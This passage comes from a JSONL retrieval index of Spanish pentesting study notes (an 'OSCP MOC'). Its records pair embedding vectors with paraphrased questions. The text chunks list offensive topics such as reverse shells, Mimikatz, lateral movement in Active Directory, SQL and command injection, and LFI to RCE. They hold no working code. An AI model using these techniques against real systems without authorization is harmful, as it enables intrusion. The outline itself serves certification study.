0.06724, -0.0271, 0.03456, 0.03668, -0.11173, -0.04428, 0.01521, -0.08055, -0.02119, 0.06281, 0.02253, -0.05605, 0.04134, 0.05157, 0.035, -0.04979, -0.06552, -0.03428, -0.01438, -0.02139, -0.01379, -0.00778, -0.03046, -0.02938, -0.00728, 0.03921, -0.02581, -0.03905, -0.00801, 0.02158, -0.06794, -0.00241, -0.02527, -0.02295, 0.00919, 0.03558, 0.07597, -0.04302, 0.0116, 0.04035, 0.10188, -0.03485, 0.00027, 0.07694, 0.01637, 0.0175, -0.02267, 0.02635, 0.02695, 0.01493, 0.02833, -0.00794, -0.04448, -0.00901, 0.06342, -0.02507, 0.00439, 0.0337, -0.00517, 0.0328, 0.01612, -0.01525, -0.0412, 0.00812, -0.01249, -0.03726, -0.06757, -0.00117, -0.03006, 0.00998, -0.10322, -0.01408, 0.08767, -0.02502, -0.06678, -0.00873, -0.03259, -0.0172, -0.03262, -0.01722, 0.01313, -0.03024, 0.00156, 0.00498, 0.0198, -0.00367, 0.01415]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La espina dorsal\nLa MetodologΓ­a OSCP es lo ΓΊnico que de verdad importa. Todo lo demΓ‘s cuelga de ella:\n\n```\nEnumeraciΓ³n β†’ vector β†’ foothold (Reverse shell) β†’\nPrivesc Linux / Privesc Windows β†’ loot (Mimikatz) β†’\nMovimiento lateral / Active Directory β†’ documentar (Reporte OSCP)\n```", "indexar": "con quΓ© puedo hacer una conexiΓ³n inversa o reverse shell?", "v": [0.03853, 0.07745, -0.08886, 0.07894, -0.00388, 0.02886, -0.14354, -0.06352, 0.00031, -0.05913, -0.11526, -0.0769, 0.0379, -0.00881, 0.05988, 0.0915, -0.03246, 0.00599, 0.01593, -0.1316, -0.08981, -0.06726, -0.0497, -0.12935, -0.04203, 0.05481, 0.01102, 0.16218, -0.01557, -0.17182, -0.16259, -0.14336, 0.09964, 0.07561, -0.13288, 0.12304, 0.01076, 0.08804, 0.13316, 0.03106, -0.01697, 0.04722, -0.07937, 0.14874, 0.08368, -0.0593, 0.03781, -0.05505, -0.00457, 0.01134, -0.19316, -0.06139, -0.18378, -0.05617, 0.00252, -0.03463, 0.07331, -0.13627, 0.04817, -0.08941, -0.07472, 0.05614, -0.09096, 0.06579, 0.07669, -0.03966, -0.08167, -0.05314, 0.00223, 0.01131, -0.02125, 0.02359, -0.01909, 0.0013, -0.03727, 0.01108, 0.16371, 0.01335, 0.00114, 0.02817, -0.15773, -0.03311, -0.04115, -0.01019, 0.09531, 0.01043, -0.07436, -0.05243, 0.06045, -0.0377, 0.01129, 0.03439, -0.0199, -0.05229, -0.0548, -0.0811, -0.10011, -0.00352, -0.15924, 0.00186, -0.02736, 0.02429, 0.03133, 0.12777, -0.01688, -0.01583, -0.04312, 0.01625, -0.00212, 0.12393, -0.01289, -0.03519, 0.06891, 0.02678, 0.05911, -0.03247, -0.04932, 0.01798, 0.00583, 0.02585, -0.01175, -0.03032, 0.02176, -0.01941, 0.01784, 0.04327, 0.01387, 0.08665, -0.00767, 0.0539, -0.04898, -0.00474, 0.01987, -0.07563, -0.00678, 0.05724, 0.1014, -0.04291, 0.01517, -0.01401, 0.02619, 0.05339, -0.03986, -0.02171, -0.03088, -0.07296, 0.1176, -0.09268, -0.09842, -0.02367, -0.06197, 0.09919, -0.04006, 0.02833, 0.00565, -0.01615, -0.02003, -0.07641, -0.00418, 0.01822, -0.04193, 0.02184, 0.00431, 0.0274, 0.00466, -0.02467, -0.0986, 0.03188, -0.00443, -0.01703, -0.08554, 0.0447, 0.04214, 0.02765, 0.04221, 0.04202, -0.01237, 0.0631, -0.00492, -0.06534, 0.04816, -0.0533, 0.00473, -0.11784, 0.02185, 0.06744, 0.02226, 0.06747, 0.0565, 0.05672, -0.01551, 0.03722, 0.01633, 0.01717, -0.00675, 0.02641, 0.05612, -0.03082, 0.05474, 0.07153, 0.06449, -0.0383, 0.09617, -0.00701, -0.03706, 0.01746, -0.0873, 0.05181, -0.00998, -0.01987, -0.00109, 0.02217, 0.05262, 0.13527, -0.01492, 0.02262, -0.01817, 0.00138, -0.06118, 0.05352, 0.03288, -0.02201, -0.06052, 0.04411, 0.04076, -0.08105, -0.01141, -0.01021, -0.04758, 0.01882, -0.00761, 0.02624, 0.01384, 0.02352, -0.04322, 0.00636, -0.07169, -0.06647, 0.06418, 0.02791, 0.02922, 0.04591, 0.01451, -0.05512, 0.04959, 0.01908, -0.01988, -0.0176, -0.03933, 0.01505, -0.03864, 0.02275, 0.00702, 0.00798, -0.004, -0.03395]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La espina dorsal\nLa MetodologΓ­a OSCP es lo ΓΊnico que de verdad importa. Todo lo demΓ‘s cuelga de ella:\n\n```\nEnumeraciΓ³n β†’ vector β†’ foothold (Reverse shell) β†’\nPrivesc Linux / Privesc Windows β†’ loot (Mimikatz) β†’\nMovimiento lateral / Active Directory β†’ documentar (Reporte OSCP)\n```", "indexar": "cuΓ‘l es la mejor herramienta para moverse lateralmente en redes con Active Directory?", "v": [0.06764, 0.09816, -0.13248, -0.15147, -0.04658, -0.01734, -0.17114, 0.07831, -0.06772, -0.08711, -0.02658, -0.11968, -0.04408, -0.0542, 0.12529, 0.05824, 0.04748, -0.04972, -0.08399, -0.06636, -0.01886, 0.01492, -0.09567, -0.02971, 0.05124, 0.01209, 0.09111, -0.02856, -0.17792, -0.0213, -0.06782, 0.02891, 0.066, -0.08702, 0.02872, -0.1439, -0.02644, 0.03762, 0.02725, -0.01355, -0.08018, 0.04739, -0.16594, 0.08621, 0.03165, 0.12743, -0.10579, -0.12655, 0.0128, 0.08084, -0.02806, -0.06501, -0.05304, 0.00332, 0.00604, -0.06297, 0.15178, -0.09094, -0.02194, -0.15324, -0.03052, 0.01207, -0.15899, -0.05633, -0.03825, -0.10685, 0.08839, -0.09577, -0.16311, 0.01529, 0.05981, 0.03981, 0.00562, 0.12403, -0.01935, 0.12576, 0.06618, 0.01627, 0.01709, 0.08969, 0.09136, 0.06396, -0.06971, 0.03465, -0.08934, -0.10098, 0.04299, -0.09651, 0.03233, 0.0062, 0.08947, 0.05469, -0.09912, 0.00816, -0.02332, 0.08397, -0.00565, -0.00583, -0.0107, -0.04461, 0.09152, -0.03558, -0.02559, 0.05408, -0.00944, 0.00366, -0.04428, 0.01507, -0.08909, 0.00153, 0.05058, -0.00829, 0.00201, 0.01443, -0.00049, 0.08121, -0.1432, -0.04975, -0.0063, 0.02059, 0.03251, -0.02281, -0.04566, -0.10398, -0.00479, 0.03502, -0.04134, 0.06123, 0.0012, 0.01805, 0.03462, -0.01786, -0.02223, -0.11988, -0.0877, -0.04761, 0.03598, -0.02047, 0.027, -0.12551, -0.03886, -0.07189, -0.02293, -0.05223, 0.06576, 0.06404, 0.08568, 0.02576, -0.04533, 0.09221, 0.03067, -0.0036, 0.03181, 0.00198, 0.01141, 0.11576, -0.07962, -0.0292, -0.12521, 0.03791, -0.02584, 0.00864, 0.01087, -0.01661, -0.02281, -0.07376, -0.06035, 0.05922, 0.06262, 0.01464, -0.01387, 0.09379, -0.01074, -0.05375, -0.05576, -0.03042, -0.04746, 0.03686, 0.04956, -0.0031, -0.00778, -0.02885, -0.01796, -0.03634, 0.00634, -0.04216, 0.0604, -0.00388, 0.00224, 0.06312, -0.02919, 0.04689, 0.0329, -0.0182, 0.06193, -0.10435, -0.01152, -0.0716, 0.05798, -0.00787, -0.05323, -0.03351, 0.01666, -0.02471, 0.03188, 0.03665, -0.03447, 0.0397, 0.0403, 0.03018, -0.0013, -0.04891, 0.08964, -0.02274, -0.0704, -0.00108, -0.00859, -0.02376, -0.03621, 0.0144, 0.00325, 0.00611, 0.03022, -0.02501, -0.03347, 0.04868, -0.00988, -0.01187, -0.02502, -0.04248, 0.05431, -0.0369, 0.01747, -0.01684, 0.00424, 0.00447, 0.07184, -0.07307, -0.03794, -0.00067, -0.03123, 0.02178, -0.00049, 0.0159, -0.03191, -0.04514, -0.05214, 0.06135, -0.02875, -0.09549, 0.00987, -0.01448, 0.08661, -0.04307, 0.02009, -0.01186]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🧭 MetodologΓ­a y examen\n- MetodologΓ­a OSCP Β· Estructura del examen Β· GestiΓ³n del tiempo\n- Reporte OSCP Β· Reglas de herramientas", "indexar": "quΓ© programa o tΓ©cnica me ayuda a prepararme para el examen OSCP?", "v": [-0.06153, 0.04676, -0.03966, -0.2651, 0.03478, -0.14181, 0.01375, 0.01947, -0.14554, -0.04219, -0.12754, 0.01371, -0.01032, -0.05343, -0.00904, 0.02915, 0.11893, -0.00592, 0.16059, 0.00323, -0.03574, -0.04735, -0.16033, 0.04661, 0.02219, 0.03101, 0.01878, -0.02268, -0.05299, -0.11865, -0.0048, 0.08252, -0.00517, -0.0672, 0.00123, 0.09394, 0.0146, -0.12357, -0.01555, 0.14106, -0.06983, -0.0901, 0.0478, 0.08328, 0.16568, -0.00635, 0.16155, 0.1493, -0.00401, -0.11615, -0.03712, -0.0369, 0.05365, -0.06345, -0.04218, -0.03869, 0.02292, -0.14437, 0.00545, -0.07805, 0.07578, -0.03674, 0.03233, -0.06957, 0.109, -0.01395, -0.00581, 0.01081, -0.0753, 0.01625, -0.05397, 0.0688, -0.0059, -0.07548, -0.13066, -0.08363, -0.01642, 0.02915, 0.16074, -0.16198, 0.00839, 0.0345, 0.06159, 0.06433, -0.09328, -0.11431, -0.00104, 0.02915, -0.0582, -0.13269, 0.02848, 0.00834, 0.06901, -0.00198, 0.13016, -0.01385, 0.09289, -0.00333, -0.02371, 0.05019, 0.04209, -0.06571, -0.06843, 0.0186, -0.14269, 0.07642, 0.06269, -0.00844, -0.10832, 0.03441, -0.06574, 0.11124, -0.05597, 0.01913, -0.12191, -0.06557, 0.05049, 0.00459, -0.03993, -0.02081, -0.02019, 0.10618, -0.00791, 0.05566, 0.09635, 0.01527, 0.05269, 0.09038, -0.01848, 0.08541, 0.00061, -0.04873, -0.077, -0.04779, -0.03856, -0.0689, -0.01637, -0.07712, -0.00086, -0.04166, -0.01608, 0.05058, 0.00298, -0.02719, -0.01477, -0.01882, 0.0453, -0.06688, -0.01158, -0.03934, -0.01184, -0.03378, 0.04091, 0.05647, -0.07125, -0.07087, 0.00515, 0.00806, -0.01812, 0.03364, -0.0374, -0.03958, -0.00455, -0.09281, -0.00998, 0.0016, -0.011, 0.00213, 0.00811, 0.0483, -0.01299, -0.00264, 0.01848, -0.03694, 0.02203, -0.01637, 0.02312, -0.03833, -0.04355, -0.03135, -0.10977, -0.00183, 0.07453, 0.02474, 0.06279, 0.02654, -0.00317, -0.02033, 0.05691, 0.00932, -0.0345, 0.00018, -0.06562, -0.04449, -0.04877, -0.00849, 0.00077, -0.04518, 0.04976, -0.0011, -0.08646, -0.06186, 0.0105, -0.06174, 0.00889, 0.05858, -0.00783, 0.00548, 0.01462, 0.03699, -0.02578, -0.03441, 0.07767, -0.00082, 0.02573, 0.01136, -0.02774, 0.10007, -0.02786, -0.01341, 0.01509, -0.02035, 0.01056, 0.07647, -0.01314, -0.02018, 0.06475, 0.03558, -3e-05, 0.03379, 0.01052, -0.07014, 0.07365, -0.02685, 0.07132, -0.02092, -0.00167, -0.0155, 0.01104, -0.04508, -0.00092, 0.05769, 0.01009, -0.06423, -0.02272, 0.02824, -0.02638, -0.02439, -0.01095, 0.00471, 0.02554, -0.01012, 0.04703, -0.05428, 0.02688, -0.00233]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🧭 MetodologΓ­a y examen\n- MetodologΓ­a OSCP Β· Estructura del examen Β· GestiΓ³n del tiempo\n- Reporte OSCP Β· Reglas de herramientas", "indexar": "con quΓ© herramienta puedo gestionar mejor mi tiempo durante un examen tipo OSCP?", "v": [-0.17538, 0.11689, -0.1028, -0.20886, -0.00762, -0.16118, -0.09346, 0.06374, -0.08428, -0.12719, -0.08567, 0.00822, -0.00163, -0.00885, 0.06421, 0.10444, 0.1096, -0.06211, -0.00895, 0.02547, -0.05074, -0.0632, -0.09452, 0.01881, 0.01754, -0.00188, 0.02803, -0.03396, -0.14912, -0.01229, -0.0284, 0.10785, 0.05661, -0.13128, -0.05301, 0.0253, -0.07581, 0.05126, 0.01999, 0.08872, -0.03394, 0.07956, 0.00254, 0.0891, 0.19259, -0.00241, 0.03736, 0.08627, -0.06263, -0.06928, -0.10648, -0.20639, -0.06246, -0.02627, -0.04956, -0.0675, 0.11995, -0.08745, 0.12616, -0.13708, -0.0248, 0.06102, -0.10378, -0.01871, 0.0491, -0.04815, 0.02599, -0.01493, -0.1365, 0.0873, -0.10058, 0.00941, -0.02478, 0.01314, -0.02892, -0.0827, 0.05646, 0.06872, 0.16948, -0.07195, 0.08787, -0.04019, -0.05918, 0.08612, -0.12039, -0.08672, 0.0395, -0.01941, -0.0454, -0.0228, -0.01862, -0.01, 0.04693, -0.01135, -0.01814, -0.03478, 0.03639, -0.06089, -0.03895, -0.04841, 0.09791, 0.01899, -0.0844, 0.06982, -0.13002, 0.03944, 0.0344, -0.02791, -0.02371, -0.06089, -0.01574, 0.04467, -0.03438, -0.0298, -0.03715, 0.02048, 0.01867, -0.06732, -0.05591, -0.04318, 0.02412, 0.00207, -0.035, 0.00382, 0.10622, 0.04237, 0.06519, 0.04275, -0.00431, -0.02119, -0.05919, -0.04806, -0.08503, 0.00121, -0.02357, -0.03116, -0.04807, -0.08112, 0.05875, -0.09095, -0.07343, 0.05898, -0.00541, -0.05714, 0.05105, -0.04318, -0.03585, -0.05902, -0.00159, -0.03923, 0.01978, -0.10192, 0.07927, 0.05469, -0.08063, 0.01013, -0.02969, -0.00448, -0.01605, 0.04508, -0.0424, -0.05653, -0.00111, 0.0096, 0.05055, 0.0047, 0.00605, 0.04894, -0.00338, -0.00677, 0.0189, 0.0221, 0.04265, -0.02846, 0.04013, -0.07213, -0.00429, -0.03036, 0.00044, -0.05173, -0.0597, 0.01929, -0.02268, -0.00497, 0.03925, -0.03294, 0.02504, 0.04755, 0.0357, 0.01138, 0.02575, 0.01926, 0.04321, -0.04439, 0.04077, -0.01583, 0.03821, -0.08709, -0.00149, 0.01297, -0.08706, -0.06813, -0.00354, -0.04805, 0.02647, 0.06691, -0.01739, 0.10919, 0.0393, 0.00209, -0.02236, 0.04307, 0.08286, -0.05655, 0.01525, 0.01472, 0.03908, 0.05613, -0.0525, -0.05222, 0.03855, 0.01528, 0.0678, 0.00102, -0.06847, 0.01801, 0.02766, 0.04979, 0.02292, 0.01668, 0.04017, -0.00571, 0.03307, -0.00615, 0.0685, -0.06123, 0.0482, -0.0769, -0.01362, -0.01985, 0.01287, 0.04207, 0.02215, -0.03318, -0.07608, -0.0024, -0.03077, -0.04733, -0.04993, -0.1007, -0.01463, -0.02877, 0.05869, -0.02558, 0.01924, 0.02059]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ” EnumeraciΓ³n\n- EnumeraciΓ³n (Γ­ndice) Β· Nmap Β· Nmap NSE Β· Puertos olvidados\n- SMB Β· SNMP Β· Netcat Β· RDP\n- EnumeraciΓ³n web Β· Content discovery Β· Vhosts y subdominios\n- searchsploit Β· Trampas de enumeraciΓ³n", "indexar": "que herramienta sirve para encontrar puertos abiertos y servicios en una red?", "v": [0.14119, 0.01515, -0.1872, -0.18747, 0.05505, -0.13941, 0.01969, -0.10401, -0.00411, -0.12503, -0.17454, -0.09776, 0.08108, -0.12905, 0.08327, -0.00952, 0.00504, -0.07558, 0.04988, 0.04707, -0.06267, 0.01587, -0.13206, -0.01693, -0.01418, 0.06061, 0.09723, -0.09092, -0.1803, 0.16199, 0.01309, -0.01312, 0.01335, -0.0301, -0.08149, -0.12663, 0.0676, 0.05793, 0.03882, 0.03657, 0.035, 0.02221, -0.01125, 0.01918, 0.06582, -0.01887, -0.02487, -0.02697, 0.00541, 0.11283, -0.03488, -0.21057, -0.17801, -0.05966, -0.03296, -0.07324, 0.07589, -0.01623, -0.0908, -0.10783, -0.08258, 0.02156, -0.04225, -0.03143, 0.03315, -0.10989, 0.005, 0.07021, -0.05553, 0.05299, -0.07553, 0.00898, -0.01059, 0.0566, -0.04751, -0.04643, -0.02094, 0.03599, 0.03233, 0.06091, 0.08126, 0.04853, -0.07209, -0.05145, -0.02272, -0.10298, -0.00229, -0.02509, 0.04656, -0.12419, 0.05954, 0.0517, -0.00118, 0.09902, -0.06255, 0.04497, -0.00094, -0.02476, 0.00421, -0.02679, 0.15788, 0.03817, -0.06258, -0.00876, -0.05252, 0.00553, -0.00425, -0.06415, 0.01282, 0.04617, 0.13843, -0.02198, 0.10027, -0.00595, 0.01172, -0.01409, -0.01208, -0.09173, -0.01733, 0.00229, 0.04763, -0.05662, -0.08333, -0.01644, -0.03643, -0.03151, -0.03474, 0.03286, 0.0277, -0.02126, 0.05266, -0.05312, -0.113, -0.02436, -0.01464, -0.09031, 0.04026, -0.14506, 0.03104, -0.05017, -0.05152, 0.04177, -0.064, -0.11662, 0.01336, 0.02758, 0.05863, -0.02066, -0.03072, -0.02721, -0.01263, -0.0165, -0.05749, 0.01548, -0.06655, 0.06, 0.05442, -0.00193, -0.11744, 0.06708, -0.03005, -0.0443, 0.00995, -0.00169, 0.0324, -0.04325, 0.01601, 0.03271, 0.08933, -0.0018, 0.00443, 0.08009, -0.01949, -0.08715, -0.03067, -0.03666, -0.0619, -0.07064, -0.02346, -0.07567, 0.00642, -0.01354, -0.06851, -0.03437, -0.04771, -0.09925, 0.03105, -0.12103, -0.02549, 0.02414, -0.01256, -0.04413, -0.01462, -0.03068, 0.00277, 0.04326, 0.00156, -0.01222, -0.03075, -0.05524, -0.0113, 0.02753, -0.01608, -0.03227, -0.01119, 0.05611, -0.02598, 0.03899, 0.00301, 0.08713, -0.03076, 0.02955, 0.04884, -0.026, -0.04678, -0.02947, 0.01044, 0.03712, 0.04414, 0.04094, -0.00649, -0.03296, -0.0526, 0.02297, 0.01773, 0.0213, 0.05119, -0.01669, 0.01935, 0.02888, 0.0615, -0.05897, -0.02884, -0.01471, -0.02719, -0.0724, 0.03787, 0.01928, -0.02994, -0.03083, 0.00494, 0.00742, -0.00298, -0.03275, 0.06048, -0.06238, -0.00037, -0.01383, 0.00786, -0.06149, -0.08176, 0.05742, 0.01773, -0.03628, 0.02885, -0.01863]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ” EnumeraciΓ³n\n- EnumeraciΓ³n (Γ­ndice) Β· Nmap Β· Nmap NSE Β· Puertos olvidados\n- SMB Β· SNMP Β· Netcat Β· RDP\n- EnumeraciΓ³n web Β· Content discovery Β· Vhosts y subdominios\n- searchsploit Β· Trampas de enumeraciΓ³n", "indexar": "con quΓ© puedo descubrir subdominios ocultos o vhosts en un sitio web?", "v": [0.0092, -0.03337, -0.14498, 0.04617, 0.00564, -0.02297, -0.04406, -0.05979, 0.05131, -0.14052, -0.10126, -0.13304, -0.04176, -0.01223, 0.01899, -0.07416, 0.26316, -0.02833, -0.03286, 0.0028, -0.01087, -0.08051, -0.08159, -0.02322, 0.09071, -0.15969, 0.06319, 0.06663, -0.05372, -0.03348, -0.00034, -0.03586, -0.07981, 0.083, -0.07497, -0.05884, -0.01249, -0.0284, 0.07912, -0.00955, 0.05818, -0.00234, 0.02803, 0.11631, -0.05752, -0.01411, -0.19192, -0.06796, 0.0155, -0.1195, -0.06508, -0.13961, -0.14478, -0.03772, 0.02617, -0.05483, 0.06524, -0.1343, 0.15697, 0.01537, 0.00119, 0.04766, 0.03474, 0.03801, 0.066, -0.08179, -0.02225, 0.16153, -0.05773, 0.01551, 0.03996, -0.02659, 0.16277, 0.02039, 0.10887, -0.01464, 0.00879, -0.05544, 0.00125, -0.0019, 0.01978, 0.10182, -0.00554, 0.08335, -0.08404, -0.06896, -0.0945, -0.05667, -0.06572, -0.0951, 0.14208, 0.03648, -0.01008, -0.01567, -0.05879, -0.11179, 0.08979, 0.00538, -0.06074, -0.04068, 0.01269, 0.08987, -0.09543, 0.12854, 0.0605, 0.11851, -0.04155, -0.04041, -0.05055, -0.02902, 0.09017, -0.01959, -0.14631, -0.00373, -0.04832, 0.02321, -0.00179, 0.05536, 0.06144, -0.04947, -0.07477, -0.02654, -0.03515, 0.04422, -0.02086, -0.00503, 0.02861, 0.03009, 0.02284, -0.07547, -0.01216, -0.05988, -0.02023, 0.03056, 0.0062, 0.02268, 0.03457, 0.02741, 0.045, 0.02527, 0.00511, -0.08067, -0.05595, 0.07209, 0.03926, 0.00947, 0.04, -0.04664, -0.06513, -0.02577, -0.05553, 0.04362, 0.01934, -0.01584, -0.00143, 0.01155, -0.00524, -0.06052, -0.05062, 0.04366, -0.00282, 0.02202, -0.02425, -0.05752, -0.04954, 0.00277, -0.10556, 0.01487, -0.0339, 0.04002, -0.01792, 0.07877, -0.01454, -0.10904, 0.02449, 0.04489, -0.02537, -0.05706, 0.04, -0.01653, 0.07188, 0.0166, -0.03617, 0.06392, -0.0774, 0.02192, 0.07413, -0.05241, -0.07364, 0.01254, 0.02568, -0.05917, -0.05807, 0.04423, 0.00177, -0.01378, 0.01314, 0.04033, 0.01019, -0.03394, -0.05886, -0.00487, 0.00499, 0.00741, -0.06282, -0.04688, -0.05751, -0.02295, -0.00836, -0.01981, 0.02874, -0.08503, 0.02196, -0.11188, -0.00683, 0.0598, -0.01641, -0.01902, -0.11656, -0.0124, 0.00325, 0.01445, 0.0267, -0.02087, 0.0801, -0.004, 0.04968, 0.05535, 0.01015, 0.07662, -0.01075, -0.04088, -0.05882, 0.06284, 0.01636, -0.03127, 0.01026, 0.01952, -0.04459, 0.10481, -0.01834, 5e-05, 0.07525, -0.01584, 0.02493, -0.07455, -0.03317, -0.00105, -0.03793, 0.02549, -0.02827, 0.00715, 0.0059, -0.0496, 0.0239, 0.05601]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ” EnumeraciΓ³n\n- EnumeraciΓ³n (Γ­ndice) Β· Nmap Β· Nmap NSE Β· Puertos olvidados\n- SMB Β· SNMP Β· Netcat Β· RDP\n- EnumeraciΓ³n web Β· Content discovery Β· Vhosts y subdominios\n- searchsploit Β· Trampas de enumeraciΓ³n", "indexar": "cual es una alternativa libre a searchsploit para buscar exploits?", "v": [-0.02292, 0.0417, -0.18772, -0.03943, -0.0465, -0.06747, -0.00282, -0.06567, -0.11624, -0.04254, 0.01027, -0.15574, -0.05827, 0.07861, 0.04409, -0.19079, 0.05208, -0.06499, 0.08124, -0.03507, -0.0884, 0.02896, -0.09059, -0.09355, -0.08137, -0.04213, -0.07526, 0.01727, -0.04469, 0.06261, -0.08904, 0.04048, -0.02805, 0.01238, -0.02492, 0.02287, 0.18372, -0.01705, 0.08728, -0.05159, 0.01518, -0.09905, -0.21173, 0.08147, -0.01368, -0.11852, -0.13014, -0.00214, -0.04924, -0.02516, -0.03353, -0.01112, -0.17171, 0.01126, 0.11729, -0.06123, 0.1428, -0.06895, -0.08157, -0.00828, -0.12568, -0.06711, 0.05162, -0.01575, 0.04884, -0.01618, 0.08682, 0.08657, -0.09094, 0.11309, -0.01025, -0.02636, -0.01853, 0.04067, -0.07373, 0.05331, 0.03208, -0.0306, 0.04831, 0.08683, 0.00866, -0.08784, -0.03885, 0.06673, -0.09348, -0.10706, 0.09781, -0.02451, 0.00411, 0.01241, 0.03539, 0.00615, -0.08081, 0.06594, -0.04167, -0.09532, 0.08627, 0.05123, -0.003, 0.14936, -0.03302, -0.04109, -0.11832, 0.03645, -0.03062, -0.02882, -0.02613, 0.07107, -0.13224, -0.00921, 0.0554, -0.03915, 0.04654, 0.02352, 0.05106, -0.01331, -0.07158, -0.07832, 0.02044, -0.05116, -0.09184, -0.01305, -0.06067, -0.03763, 0.0765, 0.00389, 0.05892, -0.03439, 0.04235, -0.03452, 0.11733, 0.01895, -0.0525, -0.06907, -0.05974, -0.06514, 0.10742, -0.03331, 0.01217, -0.00914, 0.04083, 0.0006, 0.02706, -0.07047, 0.03844, 0.01507, 0.03318, 0.04242, 0.0279, -0.12573, -0.11446, -0.07291, -0.0156, 0.10784, -0.05368, 0.00901, -0.04905, 0.00219, -0.05615, 0.08947, 0.06606, -0.02611, -0.01901, -0.00774, 0.01278, 0.00709, 0.02406, -0.0776, -0.08585, -0.03078, -0.03093, 0.05634, 0.05516, -0.09961, 0.03481, -0.04632, 0.02594, -0.06711, 0.03218, 0.00178, 0.00347, 0.00036, -0.05738, 0.01591, -0.00708, -0.08321, 0.10552, -0.02033, 0.00929, -0.07955, 0.07279, -0.03792, -0.0443, 0.00088, -0.04404, 0.05336, 0.0045, -0.03706, -0.01939, -0.07715, -0.03945, -0.03043, -0.04255, -0.04398, -0.01523, -0.04759, -0.02049, 0.00423, 0.01199, 0.02224, 0.0074, 0.02366, 0.0452, -0.02096, -0.13422, -0.03119, 0.01019, 0.00343, -0.02976, -0.00815, 0.00373, 0.06928, 0.00528, 0.03611, -0.03809, 0.03411, -0.01532, -0.00719, -0.07294, -0.01004, 0.01823, 0.0129, -0.01402, 0.02083, 0.00221, -0.03964, 0.03696, 0.04429, 0.01535, 0.01659, 0.04365, 0.04447, -0.00356, 0.03325, -0.04276, -0.007, -0.05425, -0.00192, -0.01073, -0.04602, -0.02597, -0.00507, -0.02486, -0.02164, 0.08751, -0.01467]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🌐 ExplotaciΓ³n web\n- Hacking web (Γ­ndice/metodologΓ­a) Β· Burp Suite Β· Burp Repeater e Intruder\n- SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE\n- File upload bypass Β· XSS Β· SSTI Β· Authentication attacks", "indexar": "que herramientas sirven para hacer pruebas de vulnerabilidades en web", "v": [0.11521, 0.03118, -0.18054, -0.24129, -0.01493, -0.02797, -0.06138, -0.02328, 0.1206, -0.11094, -0.04651, -0.03183, -0.0553, -0.08467, 0.00666, 0.1049, 0.03853, -0.156, 0.05498, -0.02321, -0.04076, -0.00838, -0.11051, -0.02125, -0.10708, 0.05507, -0.00536, -0.02859, -0.09891, 0.06282, -0.07516, 0.02809, 0.05809, 0.04158, -0.09952, 0.0952, -0.05126, 0.05193, 0.09032, 0.1132, 0.05273, -0.00536, -0.06466, -0.00112, 0.04665, -0.01272, -0.05898, -0.09528, -0.01714, 0.05785, -0.07638, -0.12296, -0.1161, -0.07122, -0.06, -0.08565, 0.12881, -0.14986, 0.01505, -0.04514, -0.14317, -0.02458, 0.02544, 0.03657, 0.04274, -0.01703, -0.06328, 0.04573, -0.15006, 0.12866, 0.04129, 0.00728, 0.0325, -0.04951, -0.1221, -0.07713, 0.00022, 0.04211, -0.03122, -0.02446, 0.02041, 0.08145, 0.00489, 0.05053, -0.16611, -0.05539, 0.03772, -0.00199, 0.09642, -0.10418, 0.13117, 0.12018, -0.02171, 0.00378, 0.03642, -0.04343, 0.11854, -0.03299, 0.03668, -0.09593, 0.02414, -0.05962, 0.01877, 0.00669, -0.04745, 0.0629, -0.01123, 0.06756, -0.0335, -0.05347, -0.019, 0.02707, -0.09473, -0.02634, -0.03538, 0.06834, 0.00717, -0.06521, 0.01057, -0.05077, 0.01654, -0.03345, -0.12122, 0.02101, -0.05, 0.03531, 0.05462, -0.04536, 0.02313, -0.02849, 0.08728, -0.0356, -0.08084, 0.04868, 0.04961, 0.01937, 0.0263, -0.12113, -0.04802, -0.02392, 0.03303, 0.017, -0.03158, -0.01267, 0.02228, 0.046, -0.02081, 0.0039, -0.09455, 0.00537, -0.02962, -0.03239, -0.06868, 0.05692, -0.08736, -0.05568, -0.05173, 0.003, -0.0602, 0.01355, -0.01615, 0.03085, 0.00257, 0.0704, 0.03393, 0.05376, 0.05682, 0.07252, 0.06218, 0.00728, 0.02793, 0.08552, 0.06273, -0.02546, 0.11046, 0.0167, -0.00803, -0.03229, -0.04241, -0.07255, 0.02139, -0.05252, -0.04029, 0.02427, 0.07062, 0.00242, 0.06382, -0.02511, 0.05715, 0.07305, -0.06823, -0.0281, -0.0236, 0.05563, 0.11264, 0.06336, 0.01397, 0.01944, -0.03195, -0.06205, -0.07902, -0.09253, -0.03624, -0.03903, -0.01422, 0.07147, 0.00172, -0.0741, -0.0005, 0.03554, 0.00202, 0.02938, 0.09293, -0.11684, -0.04501, -0.03885, 0.0234, 0.03995, -0.0514, -0.0244, -0.02202, -0.03243, -0.01115, 0.04125, 0.0099, 0.07401, -0.03149, -0.06113, 0.01772, -0.01103, 0.06037, -0.05014, -0.02605, 0.01326, 0.00517, -0.06832, -0.00227, 0.00845, -0.01691, -0.0167, -0.05324, 0.01618, 0.02101, -0.02222, -0.00775, -0.05611, -0.00365, -0.05625, -0.03037, -0.02044, -0.06327, -0.02954, 0.01168, -0.02813, 0.00161, -0.0404]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": 